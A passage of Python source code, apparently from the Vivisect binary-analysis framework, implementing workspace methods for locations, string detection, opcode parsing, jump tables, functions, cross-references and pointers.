quick way for scripts to get a string for a given virtual address. """ loc = self.getLocation(va) if loc is not None: return self.reprLocation(loc) return "None" def reprLocation(self, loctup): if loctup is None: return 'no loc info' lva,lsize,ltype,tinfo = loctup if ltype == LOC_OP: op = self.parseOpcode(lva, arch=tinfo & envi.ARCH_MASK) return repr(op) elif ltype == LOC_STRING: return repr(self.readMemory(lva, lsize)) elif ltype == LOC_UNI: #FIXME super ghetto "simple" unicode handling for now bytes = self.readMemory(lva, lsize) return "u'%s'" % string.join(bytes.split("\x00"),sep="") elif ltype == LOC_STRUCT: lstruct = self.getStructure(lva, tinfo) return repr(lstruct) elif ltype == LOC_NUMBER: value = self.parseNumber(lva, lsize) hexstr = "0x%%.%dx" % lsize hexstr = hexstr % value if lsize == 1: return "BYTE: %d (%s)" % (value, hexstr) else: return "%d BYTES: %d (%s)" % (lsize, value, hexstr) elif ltype == LOC_IMPORT: return "IMPORT: %s" % tinfo elif ltype == LOC_POINTER: return "PTR: %s" % self.arch.pointerString(self.getXrefsFrom(lva)[0][XR_TO]) else: n = self.getName(lva) if n is not None: return n return binascii.hexlify(self.readMemory(lva, lsize)) def followPointer(self, va): """ Do pointer analysis and folllow up the recomendation by creating locations etc... """ ltype = self.analyzePointer(va) if ltype is None: return False # Note, we only implement the types possibly # returned from analyzePointer... if ltype == LOC_OP: # NOTE: currently analyzePointer returns LOC_OP # based on function entries, lets make a func too... logger.debug('discovered new function (followPointer(0x%x))', va) self.makeFunction(va) return True elif ltype == LOC_STRING: self.makeString(va) return True elif ltype == LOC_UNI: self.makeUnicode(va) return True return False def processEntryPoints(self): ''' Roll through EntryPoints and make them into functions (if not already) ''' for eva in self.getEntryPoints(): if self.isFunction(eva): continue if not self.probeMemory(eva, 1, e_mem.MM_EXEC): continue self.makeFunction(eva) def analyze(self): """ Call this to ask any available analysis modules to do their thing... """ self.vprint('Beginning analysis...') starttime = time.time() # Now lets engage any analysis modules. If any modules return # true, they managed to change things and we should run again... for mname in self.amodlist: mod = self.amods.get(mname) self.vprint("Extended Analysis: %s" % mod.__name__) try: mod.analyze(self) except Exception as e: self.vprint("Extended Analysis Exception %s: %s" % (mod.__name__, e)) endtime = time.time() self.vprint('...analysis complete! (%d sec)' % (endtime-starttime)) self.printDiscoveredStats() self._fireEvent(VWE_AUTOANALFIN, (endtime, starttime)) def analyzeFunction(self, fva): for fmname in self.fmodlist: fmod = self.fmods.get(fmname) try: fmod.analyzeFunction(self, fva) except Exception as e: self.vprint("Function Analysis Exception for 0x%x %s: %s" % (fva, fmod.__name__, e)) self.setFunctionMeta(fva, "%s fail" % fmod.__name__, traceback.format_exc()) def getStats(self): stats = { 'functions': len(self.funcmeta), 'relocations': len(self.relocations), } return stats def printDiscoveredStats(self): (disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables) = self.getDiscoveredInfo() self.vprint("Percentage of discovered executable surface area: %.1f%% (%s / %s)" % (disc*100.0/(disc+undisc), disc, disc+undisc)) self.vprint(" Xrefs/Blocks/Funcs: (%s / %s / %s)" % (numXrefs, numBlocks, numFuncs)) self.vprint(" Locs, Ops/Strings/Unicode/Nums/Ptrs/Vtables: (%s: %s / %s / %s / %s / %s / %s)" % (numLocs, numOps, numStrings, numUnis, numNumbers, numPointers, numVtables)) def getDiscoveredInfo(self): """ Returns tuple of ( bytes_with_locations, bytes_without_locations ) for all executable maps. """ disc = 0 undisc = 0 for mva, msz, mperms, mname in self.getMemoryMaps(): if not self.isExecutable(mva): continue off = 0 while off < msz: loc = self.getLocation(mva+off) if loc is None: off += 1 undisc += 1 else: off += loc[L_SIZE] disc += loc[L_SIZE] numXrefs = len(self.getXrefs()) numLocs = len(self.getLocations()) numFuncs = len(self.getFunctions()) numBlocks = len(self.getCodeBlocks()) numOps = len(self.getLocations(LOC_OP)) numUnis = len(self.getLocations(LOC_UNI)) numStrings = len(self.getLocations(LOC_STRING)) numNumbers = len(self.getLocations(LOC_NUMBER)) numPointers = len(self.getLocations(LOC_POINTER)) numVtables = len(self.getLocations(LOC_VFTABLE)) return disc, undisc, numXrefs, numLocs, numFuncs, numBlocks, numOps, numUnis, numStrings, numNumbers, numPointers, numVtables def getImports(self): """ Return a list of imports in location tuple format. """ return self.getLocations(LOC_IMPORT) def makeImport(self, va, libname, impname): """ Add an import entry. """ if libname != '*': libname = self.normFileName(libname) tinfo = "%s.%s" % (libname, impname) self.makeName(va, "%s_%.8x" % (tinfo, va)) return self.addLocation(va, self.psize, LOC_IMPORT, tinfo=tinfo) def getExports(self): """ Return a list of exports in (va,etype,name,filename) tuples. """ return list(self.exports) def addExport(self, va, etype, name, filename, makeuniq=False): """ Add an already created export object. makeuniq allows Vivisect to append some number to make the name unique. This behavior allows for colliding names (eg. different versions of a function) to coexist in the same workspace. """ rname = "%s.%s" % (filename,name) # check if it exists and is *not* what we're trying to make it curval = self.vaByName(rname) if curval is not None and curval != va and not makeuniq: # if we don't force it to make a uniq name, bail raise Exception("Duplicate Name: %s => 0x%x (cur: 0x%x)" % (rname, va, curval)) rname = self.makeName(va, rname, makeuniq=makeuniq) self._fireEvent(VWE_ADDEXPORT, (va,etype,name,filename)) def getExport(self, va): """ Get a reference to the export object at the given va (or none). """ return self.exports_by_va.get(va) def findPointers(self, cache=True): """ Search through all currently "undefined" space and see if you can find pointers there... Returns a list of tuples where the tuple is (<ptr at>,<pts to>). """ align = self.arch.archGetPointerAlignment() if cache: ret = self.getTransMeta('findPointers') if ret is not None: # Filter locations added since last run... ret = [(va, x) for (va, x) in ret if self.getLocation(va) is None and not (va % align)] self.setTransMeta('findPointers', ret) return ret ret = [] size = self.psize for mva, msize, mperm, mname in self.getMemoryMaps(): offset, bytes = self.getByteDef(mva) maxsize = len(bytes) - size # if our memory map is not starting off aligned appropriately if offset % align: offset &= -align offset += align while offset + size < maxsize: va = mva + offset loctup = self.getLocation(va) if loctup is not None: offset += loctup[L_SIZE] if offset % align: offset += align offset &= -align continue x = e_bits.parsebytes(bytes, offset, size, bigend=self.bigend) if self.isValidPointer(x): ret.append((va, x)) offset += size continue offset += align offset &= -align if cache: self.setTransMeta('findPointers', ret) return ret def detectString(self, va): ''' If the address appears to be the start of a string, then return the string length in bytes, else return -1. ''' plen = 0 # pascal string length dlen = 0 # delphi string length if self.isReadable(va-4): plen = self.readMemValue(va - 2, 2) # pascal string length dlen = self.readMemValue(va - 4, 4) # delphi string length offset, bytez = self.getByteDef(va) maxlen = len(bytez) - offset count = 0 while count < maxlen: # If we hit another thing, then probably not. # Ignore when count==0 so detection can check something # already set as a location. if count > 0: loc = self.getLocation(va+count) if loc is not None: if loc[L_LTYPE] == LOC_STRING: if loc[L_VA] == va: return loc[L_SIZE] if ord(bytez[offset+count]) != 0: # we probably hit a case where the string at the lower va is # technically the start of the full string, but the binary does # some optimizations and just ref's inside the full string to save # some space return count + loc[L_SIZE] return loc[L_VA] - (va + count) + loc[L_SIZE] return -1 c = bytez[offset+count] # The "strings" algo basically says 4 or more... if ord(c) == 0 and count >= 4: return count elif ord(c) == 0 and (count == dlen or count == plen): return count if c not in string.printable: return -1 count += 1 return -1 def isProbablyString(self, va): if self.detectString(va) > 0 : return True return False def detectUnicode(self, va): ''' If the address appears to be the start of a unicode string, then return the string length in bytes, else return -1. This will return true if the memory location is likely *simple* UTF16-LE unicode (<ascii><0><ascii><0><0><0>). ''' # FIXME this does not detect Unicode... offset, bytes = self.getByteDef(va) maxlen = len(bytes) - offset count = 0 if maxlen < 2: return -1 charset = bytes[offset + 1] while count < maxlen: # If we hit another thing, then probably not. # Ignore when count==0 so detection can check something # already set as a location. if (count > 0): loc = self.getLocation(va+count) if loc: if loc[L_LTYPE] == LOC_UNI: if loc[L_VA] == va: return loc[L_SIZE] if ord(bytes[offset+count]) != 0: # same thing as in the string case, a binary can ref into a string # only part of the full string. return count + loc[L_SIZE] return loc[L_VA] - (va + count) + loc[L_SIZE] return -1 c0 = bytes[offset+count] if offset+count+1 >= len(bytes): return -1 c1 = bytes[offset+count+1] # If we find our null terminator after more # than 4 chars, we're probably a real string if ord(c0) == 0: if count > 8: return count return -1 # If the first byte char isn't printable, then # we're probably not a real "simple" ascii string if c0 not in string.printable: return -1 # If it's not null,char,null,char then it's # not simple unicode... if c1 != charset: return -1 count += 2 return -1 def isProbablyUnicode(self, va): if self.detectUnicode(va) > 0 : return True return False def isProbablyCode(self, va): """ Most of the time, absolute pointes which point to code point to the function entry, so test it for the sig. """ if not self.isExecutable(va): return False ret = self.isFunctionSignature(va) if ret: return ret if self.iscode.get(va): return False self.iscode[va] = True emu = self.getEmulator() emu.setMeta('silent', True) wat = v_emucode.watcher(self, va) emu.setEmulationMonitor(wat) try: emu.runFunction(va, maxhit=1) except Exception as e: return False if wat.looksgood(): return True return False ################################################################# # # Opcode API # def parseOpcode(self, va, arch=envi.ARCH_DEFAULT): ''' Parse an opcode from the specified virtual address. Example: op = m.parseOpcode(0x7c773803) note: differs from the IMemory interface by checking loclist ''' off, b = self.getByteDef(va) if arch == envi.ARCH_DEFAULT: loctup = self.getLocation(va) # XXX - in the case where we've set a location on what should be an # opcode lets make sure L_LTYPE == LOC_OP if not lets reset L_TINFO = original arch param # so that at least parse opcode wont fail if loctup is not None and loctup[L_TINFO] and loctup[L_LTYPE] == LOC_OP: arch = loctup[L_TINFO] return self.imem_archs[(arch & envi.ARCH_MASK) >> 16].archParseOpcode(b, off, va) def iterJumpTable(self, startva, step=None, maxiters=None, rebase=False): if not step: step = self.psize fname = self.getMemoryMap(startva) if fname is None: return fname = fname[3] imgbase = self.getFileMeta(fname, 'imagebase') iters = 0 ptrbase = startva rdest = self.readMemValue(ptrbase, step) if rebase and rdest < imgbase: rdest += imgbase while self.isValidPointer(rdest) and self.isExecutable(rdest) and self.analyzePointer(rdest) in (None, LOC_OP): if self.analyzePointer(ptrbase) in STOP_LOCS: break yield rdest ptrbase += step if len(self.getXrefsTo(ptrbase)): break rdest = self.readMemValue(ptrbase, step) if rebase and rdest < imgbase: rdest += imgbase iters += 1 if maxiters is not None and iters >= maxiters: break def moveCodeBlock(self, cbva, newfva): cb = self.getCodeBlock(cbva) if cb is None: return if cb[CB_FUNCVA] == newfva: return self.delCodeBlock(cb) self.addCodeBlock((cb[CB_VA], cb[CB_SIZE], newfva)) def splitJumpTable(self, callingVa, prevRefVa, newTablAddr, rebase=False, psize=4): ''' So we have the case where if we have two jump tables laid out consecutively in memory (let's call them tables Foo and Bar, with Foo coming before Bar), and we see Foo first, we're going to recognize Foo as being a giant table, with all of Bar overlapping with Foo So we need to construct a list of now invalid references from prevRefVa, starting at newTablAddr newTablAddr should point to the new jump table, and those new codeblock VAs should be removed from the list of references that prevRefVa refs to (and delete the name) We also need to check to see if the functions themselves line up (ie, do these two jump tables even belong to the same function, or should we remove the code block from the function entirely?) ''' # Due to how codeflow happens, we have no guarantee if these two adjacent jump tables are # even in the same function codeblocks = set() curfva = self.getFunction(callingVa) # collect all the entries for the new jump table for cb in self.iterJumpTable(newTablAddr, rebase=rebase, step=psize): codeblocks.add(cb) prevcb = self.getCodeBlock(cb) if prevcb is None: continue # we may also have to break these codeblocks from the old function # 1 -- new func is none, old func is none # * can't happen. if the codeblock is defined, we at least have an old function # 2 -- new func is not none, old func is none # * Can't happen. see above # 3 -- new func is none, old func is not none # * delete the codeblock. we've dropped into a new function that is different from the old # since how codeflow discover functions, we should have all the code blocks for function # 4 -- neither are none # * moveCodeBlock -- that func will handle whether or not functions are the same if curfva is not None: self.moveCodeBlock(cb, curcb[CB_FUNCVA]) else: self.delCodeBlock(prevcb[CB_VA]) # now delete those entries from the previous jump table oldrefs = self.getXrefsFrom(prevRefVa) todel = [xref for xref in self.getXrefsFrom(prevRefVa) if xref[1] in codeblocks] for va in todel: self.setComment(va[1], None) self.delXref(va) def makeJumpTable(self, op, tova, rebase=False, psize=4): fname = self.getMemoryMap(tova)[3] imgbase = self.getFileMeta(fname, 'imagebase') ptrbase = tova rdest = self.readMemValue(ptrbase, psize) if rebase and rdest < imgbase: rdest += imgbase # if there's already an Xref to this address from another jump table, we overshot # the other table, and need to cut that one short, delete its Xrefs starting at this one # and then let the rest of this function build the new jump table # This jump table also may not be in the same function as the other jump table, so we need # to remove those codeblocks (and child codeblocks) from this function # at this point, rdest should be the first codeblock in the jumptable, so get all the xrefs to him # (but skipping over the current jumptable base address we're looking at) for xrfrom, xrto, rtype, rflags in self.getXrefsTo(rdest): if tova == xrfrom: continue refva, refsize, reftype, refinfo = self.getLocation(xrfrom) if reftype != LOC_OP: continue # If we've already constructed this opcode location and made the xref to the new codeblock, # that should mean we've already made the jump table, so there should be no need to split this # jump table. if refva == op.va: continue refop = self.parseOpcode(refva) for refbase, refbflags in refop.getBranches(): if refbflags & envi.BR_TABLE: self.splitJumpTable(op.va, refva, tova, psize=psize) tabdone = {} for i, rdest in enumerate(self.iterJumpTable(ptrbase, rebase=rebase, step=psize)): if not tabdone.get(rdest): tabdone[rdest] = True self.addXref(op.va, rdest, REF_CODE, envi.BR_COND) if self.getName(rdest) is None: self.makeName(rdest, "case%d_%.8x" % (i, op.va)) else: cmnt = self.getComment(rdest) if cmnt is None: self.setComment(rdest, "Other Case(s): %d" % i) else: cmnt += ", %d" % i self.setComment(rdest, cmnt) # This must be second (len(xrefsto)) self.addXref(op.va, tova, REF_PTR) def makeOpcode(self, va, op=None, arch=envi.ARCH_DEFAULT): """ Create a single opcode location. If you have already parsed the opcode object, you may pass it in. """ if op is None: try: op = self.parseOpcode(va, arch=arch) except envi.InvalidInstruction as msg: # FIXME something is just not right about this... bytez = self.readMemory(va, 16) logger.warning("Invalid Instruct Attempt At:", hex(va), binascii.hexlify(bytez)) raise InvalidLocation(va, msg) except Exception as msg: raise InvalidLocation(va, msg) # Add our opcode location first (op flags become ldata) loc = self.addLocation(va, op.size, LOC_OP, op.iflags) # This takes care of all normal indirect immediates brdone = {} brlist = op.getBranches() for tova, bflags in brlist: # If there were unresolved dynamic branches, oh well... if tova is None: continue if not self.isValidPointer(tova): continue brdone[tova] = True # Special case, if it's a table branch, lets resolve it now. if bflags & envi.BR_TABLE: self.makeJumpTable(op, tova) elif bflags & envi.BR_DEREF: self.addXref(va, tova, REF_DATA) ptrdest = None if self.getLocation(tova) is None: ptrdest = self.makePointer(tova, follow=False) # If the actual dest is executable, make a code ref fixup # which *removes* the deref flag... if ptrdest and self.probeMemory(ptrdest[0], 1, e_mem.MM_EXEC): self.addXref(va, ptrdest[0], REF_CODE, bflags & ~envi.BR_DEREF) else: self.addXref(va, tova, REF_CODE, bflags) else: # vivisect does NOT create REF_CODE entries for # instruction fall through if bflags & envi.BR_FALL: continue self.addXref(va, tova, REF_CODE, bflags) # Check the instruction for static d-refs for oidx, o in op.genRefOpers(emu=None): # FIXME it would be nice if we could just do this one time # in the emulation pass (or hint emulation that some have already # been done. # unfortunately, emulation pass only occurs for code identified # within a marked function. # future fix: move this all into VivCodeFlowContext. # Does the operand touch memory ? if o.isDeref(): ref = o.getOperAddr(op, None) if brdone.get(ref, False): continue if ref is not None and self.isValidPointer(ref): # It's a data reference. lets also check if the data is # a pointer. self.addXref(va, ref, REF_DATA) # If we don't already know what type this location is, # lets make it either a pointer or a number... if self.getLocation(ref) is None: offset, _ = self.getByteDef(ref) val = self.parseNumber(ref, o.tsize) # So we need the size check to avoid things like "aaaaa", maybe # but maybe if we do something like the tsize must be either the # target pointer size or in a set of them that the arch defines? if (self.psize == o.tsize and self.isValidPointer(val)): self.makePointer(ref, tova=val) else: self.makeNumber(ref, o.tsize) else: ref = o.getOperValue(op) if brdone.get(ref, False): continue if ref is not None and type(ref) in (int, long) and self.isValidPointer(ref): self.addXref(va, ref, REF_PTR) return loc def _dbgLocEntry(self, va): """ Display the human-happy version of a location """ loc = self.getLocation(va) if loc is None: return 'None' lva, lsz, ltype, ltinfo = loc ltvar = loc_lookups.get(ltype) ltdesc = loc_type_names.get(ltype) locrepr = '(0x%x, %d, %s, %r) # %s' % (lva, lsz, ltvar, ltinfo, ltdesc) return locrepr def updateCallsFrom(self, fva, ncalls): function = self.getFunction(fva) prev_call = self.getFunctionMeta(function, 'CallsFrom') ncall = set(prev_call).union(calls_from) self.setFunctionMeta(function, 'CallsFrom', list(ncall)) def makeCode(self, va, arch=envi.ARCH_DEFAULT, fva=None): """ Attempt to begin code-flow based disassembly by starting at the given va. The va will be made into an OpcodeLoc and refs will be walked continuing to make code where possible. """ # If this is already a location, bail. if self.isLocation(va): return calls_from = self.cfctx.addCodeFlow(va, arch=arch) if fva is None: self.setVaSetRow('CodeFragments', (va, calls_from)) else: self.updateCallsFrom(va, calls_from) return calls_from def previewCode(self, va, arch=envi.ARCH_DEFAULT): ''' Show the repr of an instruction in the current canvas *before* making it that ''' try: op = self.parseOpcode(va, arch) if op is None: self.vprint("0x%x - None") else: self.vprint("0x%x (%d bytes) %s" % (va, len(op), repr(op))) except Exception: self.vprint("0x%x - decode exception" % va) logger.exception("preview opcode exception:") ################################################################# # # Function API # def isFunction(self, funcva): """ Return True if funcva is a function entry point. """ return self.funcmeta.get(funcva) is not None def isFunctionThunk(self, funcva): """ Return True if funcva is a function thunk """ # TODO: could we do more here? try: return self.getFunctionMeta(funcva, 'Thunk') is not None except InvalidFunction: return False def getFunctions(self): """ Return a list of the function virtual addresses defined in the workspace. """ return self.funcmeta.keys() def getFunction(self, va): """ Return the VA for this function. This will search code blocks and check for a function va. """ if self.funcmeta.get(va) is not None: return va cbtup = self.getCodeBlock(va) if cbtup is not None: return cbtup[CB_FUNCVA] return None def makeFunction(self, va, meta=None, arch=envi.ARCH_DEFAULT): """ Do parsing for function information and add a new function doodad. This function should probably only be called once code-flow for the area is complete. """ if self.isFunction(va): return if not self.isValidPointer(va): raise InvalidLocation(va) loc = self.getLocation(va) if loc is not None and loc[L_TINFO] is not None and loc[L_LTYPE] == LOC_OP: arch = loc[L_TINFO] realfva = self.cfctx.addEntryPoint(va, arch=arch) if meta is not None: for key, val in meta.items(): self.setFunctionMeta(realfva, key, val) return realfva def delFunction(self, funcva): """ Remove a function, it's code blocks and all associated meta """ if self.funcmeta.get(funcva) is None: raise InvalidLocation(funcva) self._fireEvent(VWE_DELFUNCTION, funcva) def setFunctionArg(self, fva, idx, atype, aname): ''' Set the name and type information for a single function arguemnt by index. Example: # If we were setting up main... vw.setFunctionArg(fva, 0, 'int','argc') vw.setFunctionArg(fva, 1, 'char **','argv') ''' rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva) while len(callargs) <= idx: callargs.append( ('int','arg%d' % len(callargs)) ) callargs[idx] = (atype,aname) self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs)) def getFunctionArgs(self, fva): ''' Returns the list of (typename,argname) tuples which define the arguments for the specified function. Example: for typename,argname in vw.getFunctionArgs(fva): print('Takes: %s %s' % (typename,argname)) ''' rettype,retname,callconv,callname,callargs = self.getFunctionApi(fva) return list(callargs) def getFunctionApi(self, fva): ''' Retrieve the API definition for the given function address. Returns: an API tuple (similar to impapi subsystem) or None ( rettype, retname, callconv, funcname, ( (argtype, argname), ...) ) ''' ret = self.getFunctionMeta(fva, 'api') if ret is not None: return ret defcall = self.getMeta('DefaultCall','unkcall') return ('void',None,defcall,None,()) def setFunctionApi(self, fva, apidef): ''' Set a function's API definition. NOTE: apidef is a tuple similar to the impapi subsystem ( rettype, retname, callconv, funcname, ( (argtype, argname), ...) ) Example: apidef = ('int','size','stdcall','getThingSize', ( ('void *','thing'), )) vw.setFunctionApi(fva, apidef) ''' self.setFunctionMeta(fva, 'api', apidef) def getFunctionLocals(self, fva): ''' Retrieve the list of (fva,spdelta,symtype,syminfo) tuples which represent the given function's local memory offsets. ''' if not self.isFunction(fva): raise InvalidFunction(fva) return self.localsyms[fva].values() def getFunctionLocal(self, fva, spdelta): ''' Retrieve a function local symbol definition as a (typename,symname) tuple or None if not found. NOTE: If the local symbol references a LSYM_FARG, this API will resolve the argument name/type from the function API definition. Example: locsym = vw.getFunctionLocal(fva, 8) if locsym: symtype,symname = locsym print('%s %s;' % (symtype,symname)) ''' locsym = self.localsyms[fva].get(spdelta) if locsym is None: return None fva,spdelta,symtype,syminfo = locsym if symtype == LSYM_NAME: return syminfo if symtype == LSYM_FARG: apidef = self.getFunctionApi(fva) if apidef is None: return None funcargs = apidef[-1] if syminfo >= len(funcargs): return None return funcargs[syminfo] raise Exception('Unknown Local Symbol Type: %d' % symtype) def setFunctionLocal(self, fva, spdelta, symtype, syminfo): ''' Assign a local symbol within a function (addressed by delta from initial sp). For each symbol, a "symtype" and "syminfo" field are used to specify the details. Example: # Setup a regular local integer vw.setFunctionLocal(fva, -4, LSYM_NAME, ('int','x')) # Setup a link to a stack argument... (ie. i386 cdecl) vw.setFunctionLocal(fva, 4, LSYM_FARG, 0) # Setup amd64 style shadow space vw.setFunctionLocal(fva, 8, LSYM_NAME, ('void *','shadow0')) ''' metaname = 'LocalSymbol:%d' % spdelta metavalue = (fva,spdelta,symtype,syminfo) self.setFunctionMeta(fva, metaname, metavalue) def setFunctionMeta(self, funcva, key, value): """ Set meta key,value pairs that describe a particular function (by funcva). Example: vw.setFunctionMeta(fva, "WootKey", 10) """ if not self.isFunction(funcva): raise InvalidFunction(funcva) self._fireEvent(VWE_SETFUNCMETA, (funcva, key, value)) def getFunctionMeta(self, funcva, key, default=None): m = self.funcmeta.get(funcva) if m is None: raise InvalidFunction(funcva) return m.get(key, default) def getFunctionMetaDict(self, funcva): """ Return the entire dictionary of function metadata for the function specified at funcva """ return self.funcmeta.get(funcva) def getFunctionBlocks(self, funcva): """ Return the code-block objects for the given function va """ ret = self.codeblocks_by_funcva.get(funcva) if ret is None: ret = [] return ret def makeFunctionThunk(self, fva, thname, addVa=True, filelocal=False): """ Inform the workspace that a given function is considered a "thunk" to another. This allows the workspace to process argument inheritance and several other things. Usage: vw.makeFunctionThunk(0xvavavava, "kernel32.CreateProcessA") """ self.checkNoRetApi(thname, fva) self.setFunctionMeta(fva, "Thunk", thname) n = self.getName(fva) base = thname.split(".")[-1] if addVa: name = "%s_%.8x" % (base,fva) else: name = base newname = self.makeName(fva, name, filelocal=filelocal, makeuniq=True) api = self.getImpApi(thname) if api: # Set any argument names that are None rettype,retname,callconv,callname,callargs = api callargs = [ callargs[i] if callargs[i][1] else (callargs[i][0],'arg%d' % i) for i in range(len(callargs)) ] self.setFunctionApi(fva, (rettype,retname,callconv,callname,callargs)) def getCallers(self, va): ''' Get the va for all the callers of the given function/import. Example: for va in vw.getCallers( importva ): dostuff(va) ''' ret = [] for fromva, tova, rtype, rflags in self.getXrefsTo(va, rtype=REF_CODE): if rflags & envi.BR_PROC: ret.append(fromva) return ret def getCallGraph(self): ''' Retrieve a visgraph Graph object representing all known inter procedural branches in the workspace. Each node has an ID that is the same as the function va. Example: graph = vw.getCallGraph() ''' return self._call_graph def getFunctionGraph(self, fva): ''' Retrieve a code-block graph for the specified virtual address. Procedural branches (ie, calls) will not be followed during graph construction. ''' return viv_codegraph.FuncBlockGraph(self,fva) def getImportCallers(self, name): """ Get a list of all the callers who reference the specified import by name. (If we detect that the name is actually *in* our workspace, return those callers too... """ ret = [] # If it's a local function, do that too.. fva = self.vaByName(name) if fva is not None and self.isFunction(fva): ret = self.getCallers(fva) for fva in self.getFunctions(): if self.getFunctionMeta(fva, 'Thunk') == name: ret.extend( self.getCallers( fva ) ) for lva,lsize,ltype,tinfo in self.getLocations(LOC_IMPORT): if tinfo == name: ret.extend( self.getCallers( lva ) ) return ret ################################################################# # # Xref API # def getXrefs(self, rtype=None): """ Return the entire list of XREF tuples for this workspace. """ if rtype: return [ xtup for xtup in self.xrefs if xtup[XR_RTYPE] == rtype ] return self.xrefs def getXrefsFrom(self, va, rtype=None): """ Return a list of tuples for the xrefs whose origin is the specified va. Optionally, only return xrefs whose type field is rtype if specified. example: for fromva, tova, rtype, rflags in vw.getXrefsFrom(0x41414141): dostuff(tova) """ ret = [] xrefs = self.xrefs_by_from.get(va, None) if xrefs is None: return ret if rtype is None: return xrefs return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ] def getXrefsTo(self, va, rtype=None): """ Get a list of xrefs which point to the given va. Optionally, specify an rtype to get only xrefs of that type. """ # FIXME make xrefs use MapLookup! ret = [] xrefs = self.xrefs_by_to.get(va, None) if xrefs is None: return ret if rtype is None: return xrefs return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ] def addMemoryMap(self, va, perms, fname, bytes): """ Add a memory map to the workspace. This is the *only* way to get memory backings into the workspace. """ self._fireEvent(VWE_ADDMMAP, (va, perms, fname, bytes)) def delMemoryMap(self, va): raise "OMG" def addSegment(self, va, size, name, filename): """ Add a "segment" to the workspace. A segment is generally some meaningful area inside of a memory map. For PE binaries, a segment and a memory map are synonymous. However, some platforms (Elf) specify their memory maps (program headers) and segments (sectons) seperately. """ self._fireEvent(VWE_ADDSEGMENT, (va,size,name,filename)) def getSegment(self, va): """ Return the tuple representation of a segment. With the following format: (va, size, name, filename) """ for seg in self.segments: sva, ssize, sname, sfile = seg if va >= sva and va < (sva + ssize): return seg return None def getSegments(self): """ Return a list of segment tuples (see getSegment) for all the segments defined in the current worksace """ return list(self.segments) def addCodeBlock(self, va, size, funcva): """ Add a region of code which belongs to a function. Code-block boundaries are at all logical branches and have more in common with a logical graph view than function chunks. """ loc = self.getLocation( va ) if loc is None: raise Exception('Adding Codeblock on *non* location?!?: 0x%.8x' % va) self._fireEvent(VWE_ADDCODEBLOCK, (va,size,funcva)) def getCodeBlock(self, va): """ Return the codeblock which contains the given va. A "codeblock" is a location compatable tuple: (va, size, funcva) """ return self.blockmap.getMapLookup(va) def delCodeBlock(self, va): """ Remove a code-block definition from the codeblock namespace. """ cb = self.getCodeBlock(va) if cb is None: raise Exception("Unknown Code Block: 0x%x" % va) self._fireEvent(VWE_DELCODEBLOCK, cb) def getCodeBlocks(self): """ Return a list of all the codeblock objects. """ return list(self.codeblocks) def addXref(self, fromva, tova, reftype, rflags=0): """ Add an xref with the specified fromva, tova, and reftype (see REF_ macros). This will *not* trigger any analysis. Callers are expected to do their own xref analysis (ie, makeCode() etc) """ # Architecture gets to decide on actual final VA (ARM/THUMB/etc...) tova, reftype, rflags = self.arch.archModifyXrefAddr(tova, reftype, rflags) ref = (fromva, tova, reftype, rflags) if ref in self.getXrefsFrom(fromva): return self._fireEvent(VWE_ADDXREF, (fromva, tova, reftype, rflags)) def delXref(self, ref): """ Remove the given xref. This *will* exception if the xref doesn't already exist... """ if ref not in self.getXrefsFrom(ref[XR_FROM]): raise Exception("Unknown Xref: %x %x %d" % ref) self._fireEvent(VWE_DELXREF, ref) def analyzePointer(self, va): """ Assume that a new pointer has been created. Check if it's target has a defined location and if not, try to figgure out wtf is there... Will return the location type of the location it recommends or None if a location is already there or it has no idea. """ if self.getLocation(va) is not None: return None if self.isProbablyString(va): return LOC_STRING elif self.isProbablyUnicode(va): return LOC_UNI elif self.isProbablyCode(va): return LOC_OP return None def getMeta(self, name, default=None): return self.metadata.get(name, default) def setMeta(self, name, value): """ Set a meta key,value pair for this workspace. """ self._fireEvent(VWE_SETMETA, (name,value)) def markDeadData(self, start, end): """ mark a virtual range as dead code. """ self.setMeta("deaddata:0x%08x" % start, (start, end)) def unmarkDeadData(self, start, end): """ unmark a virtual range as dead code """ self._dead_data.remove( (start,end) ) def _mcb_deaddata(self, name, value): """ callback from setMeta with namespace deaddata: that indicates a range has been added as dead data. """ if value not in self._dead_data: self._dead_data.append( value ) def isDeadData(self, va): """ Return boolean indicating va is in a dead data range. """ for start,end in self._dead_data: if va >= start and va <= end: return True return False def initMeta(self, name, value): """ Set a metakey ONLY if it is not already set. Either way return the value of the meta key. """ m = self.getMeta(name) if m is None: self.setMeta(name, value) m = value return m def getTransMeta(self, mname, default=None): ''' Retrieve a piece of "transient" metadata which is *not* stored across runs or pushed through the event subsystem. ''' return self.transmeta.get(mname,default) def setTransMeta(self, mname, value): ''' Store a piece of "transient" metadata which is *not* stored across runs or pushed through the event subsystem. ''' self.transmeta[mname] = value def castPointer(self, va): """ Return the value for a pointer in memory at the given location. This method does NOT create a location object or do anything other than parse memory. """ offset, bytes = self.getByteDef(va) return e_bits.parsebytes(bytes, offset, self.psize, bigend=self.bigend) def makePointer(self, va, tova=None, follow=True): """ Create a new pointer location in the workspace. If you have already parsed out the pointers value, you may specify tova to speed things up. """ loctup = self.getLocation(va) if loctup is not None: logger.warn("0x%x: Attempting to make a Pointer where another location object exists (of type %r)", va, self.reprLocation(loctup)) return None psize = self.psize # Get and document the xrefs created for the new location if tova is None: tova = self.castPointer(va) self.addXref(va, tova, REF_PTR) ploc = self.addLocation(va, psize, LOC_POINTER) if follow and self.isValidPointer(tova): self.followPointer(tova) return ploc def makePad(self, va, size): """ A special utility for making a pad of a particular size. """ return self.addLocation(va, size, LOC_PAD, None) def makeNumber(self, va, size, val=None): """ Create a number location in memory of the given size. (you may specify val if you have already parsed the value from memory and would like to save CPU cycles) """ return self.addLocation(va, size, LOC_NUMBER, None) def parseNumber(self, va, size): ''' Parse a <size> width numeric value from memory at <va>. Example: val = vw.parseNumber(0x41414140, 4) ''' offset, bytes = self.getByteDef(va) return e_bits.parsebytes(bytes, offset, size, bigend=self.bigend) def _getSubstrings(self, va, size, ltyp): # rip through the desired memory range to populate any substrings subs = set() end = va + size for offs in range(va, end, 1): loc = self.getLocation(offs, range=True) if loc and loc[L_LTYPE] == LOC_STRING and loc[L_VA] > va: subs.add((loc[L_VA], loc[L_SIZE])) if loc[L_TINFO]: subs = subs.union(set(loc[L_TINFO])) return list(subs) def _getStrTinfo(self, va, size, subs): ploc = self.getLocation(va, range=False) if ploc: # the string we're making is a 